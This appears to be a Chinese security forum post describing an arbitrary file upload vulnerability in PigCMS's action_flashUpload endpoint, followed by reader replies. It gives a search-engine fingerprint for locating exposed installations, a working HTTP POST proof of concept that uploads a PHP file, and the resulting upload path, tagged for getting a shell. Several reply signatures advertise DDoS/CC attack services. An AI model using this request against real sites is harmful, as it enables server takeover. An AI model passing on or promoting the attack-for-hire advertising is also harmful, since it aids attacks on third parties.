登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
资讯
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
1
2
3
/ 3 页
下一页
返回列表
首页
›
资源区
›
程序
›
PigCMS action_flashUpload 任意文件上传漏洞
漏洞分析
PigCMS action_flashUpload 任意文件上传漏洞
[ 复制链接 ]
anyue1937
2025-10-15 20:07:52
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
## 漏洞描述
PigCMS action_flashUpload 方法中存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取到服务器权限
## 漏洞影响
pigcms
## 网络测绘
```app.name="PigCMS"```
## 漏洞复现
登陆页面

验证POC
```POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1Host:Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----aaa
------aaaContent-Disposition: form-data; name="filePath"; filename="test.php"Content-Type: video/x-flv
<?php phpinfo();?>------aaa```

```/cms/upload/images/2025/08/11/1691722887xXbx.php```
渗透
漏洞
getshell
相关帖子
AI时代,渗透测试工作将如何开展?
AI渗透测试工具:从"脚本跑腿"到"Agent大脑"的范式革命
H2O-3反序列化漏洞分析(CVE-2025-6507&CVE-2025-6544)
用AI写代码,我差点把漏洞发上线:血泪总结的10个教训
Xstream历史漏洞审计
Burpsuite靶场-jwt漏洞原理总结及复现
MCPHub 高危漏洞实录:零凭证访问与授权后命令执行
【渗透测试】HTB Season10 VariaType 全过程wp
openclaw的三大高危漏洞之下,还敢“AI养虾”?
Ledger靶机 渗透测试报告
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
业界
AI时代,渗透测试工作将如何开展?
0
785
韩素欣
2026-02-26
科技
AI渗透测试工具:从"脚本跑腿"到"Agent大脑"的范式革命
1
500
热琢
2026-03-01
安全
H2O-3反序列化漏洞分析(CVE-2025-6507&CVE-2025-6544)
4
973
挡缭
2026-03-04
安全
用AI写代码,我差点把漏洞发上线:血泪总结的10个教训
0
224
圣罩
2026-03-05
业界
Xstream历史漏洞审计
0
14
讲怔
2026-03-06
业界
Burpsuite靶场-jwt漏洞原理总结及复现
0
13
寨亳
2026-03-11
安全
MCPHub 高危漏洞实录:零凭证访问与授权后命令执行
0
435
皆炳
2026-03-14
业界
【渗透测试】HTB Season10 VariaType 全过程wp
0
71
金娅鸣
2026-03-18
安全
openclaw的三大高危漏洞之下,还敢“AI养虾”?
0
293
王平莹
2026-03-19
安全
Ledger靶机 渗透测试报告
0
219
墨淳雅
2026-03-19
回复
(40)
映各
2025-10-31 03:02:59
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
感谢分享,学习下。
喳谍
2025-11-25 20:37:34
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
懂技术并乐意极积无私分享的人越来越少。珍惜
荆邦
2025-12-25 16:29:51
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
收藏一下 不知道什么时候能用到
计海龄
2026-1-2 17:59:53
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
用心讨论,共获提升!
驶桐柢
2026-1-4 17:15:38
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
谢谢分享,试用一下
抑卞枯
2026-1-5 16:11:08
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
感谢分享,学习下。
骆贵
2026-1-14 07:55:01
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
新版吗?好像是停更了吧。
轮达
2026-1-15 21:49:11
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
很好很强大 我过来先占个楼 待编辑
党新苗
2026-1-18 08:05:50
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
这个好,看起来很实用
瞿佳悦
2026-1-18 21:11:35
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
谢谢分享,辛苦了
客臂渐
2026-1-18 23:49:04
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
新版吗?好像是停更了吧。
钿稳铆
2026-1-20 14:32:36
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
东西不错很实用谢谢分享
魁睥
2026-1-20 20:54:15
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
谢谢分享,辛苦了
跑两獗
2026-1-21 18:47:28
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
感谢分享,下载保存了,貌似很强大
凤患更
2026-1-22 13:33:13
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
谢谢分享,试用一下
劳暄美
2026-1-23 07:50:50
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
过来提前占个楼
辖瑁地
2026-1-23 08:30:44
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
喜欢鼓捣这些软件,现在用得少,谢谢分享!
仰翡邸
2026-1-23 09:29:53
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
分享、互助 让互联网精神温暖你我
笙芝
2026-1-27 18:07:36
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
很好很强大 我过来先占个楼 待编辑
下一页 »
1
2
3
/ 3 页
下一页
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
浏览过的版块
安全
业界
签约作者
程序园优秀签约作者
发帖
anyue1937
2026-1-27 18:07:36
关注
0
粉丝关注
3
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
3934307807
991125
anyue1937
9994892
kk14977
6845359
4
xiangqian
638210
5
神泱
9522
6
韶又彤
9912
7
宋子
9878
8
荪俗
9016
9
闰咄阅
9995
10
刎唇
9995
查看更多
今日好文热榜
214
从车载HMI到数字座舱平台:基于Qt与Qtitan
649
彻底告别OpenClaw使用焦虑:我给他装上了“
631
PingCraft:从需求文档到可追踪工作项的 Ag
774
【译】 数据摄取构建模块简介(预览版)(二
923
【故障公告】数据库服务器磁盘 MBPS 高造成
746
"Memory in the Age of AI Agents: A Surve
217
Prompt 焚诀——一个模板,终结你和 AI 的
516
【节点】[SampleTexture3D节点]原理解析与
168
记一次Webshell流量分析 | 添柴不加火
981
旧安卓手机部署openclaw
638
AI编程时代,35岁以上程序员将何去何从?
831
[Refactor]CPP Learn Data Day 1
5
Block Copy 的内存布局详解
620
把 Flask 搬进 ESP32,高中生自研嵌入式 We
9
渐得如意智能自动化办公平台——定义属于你
892
[AI/Agent/社交] AI Agent社交网络产品:Mo
528
C++协程入门
288
TCSSOFTDEPTCOPY.zip Can download source
805
Vue3 + Iframe 实战:打造企业级流程配置中
825
“你用AI,那我也会用AI,我还要你干什么?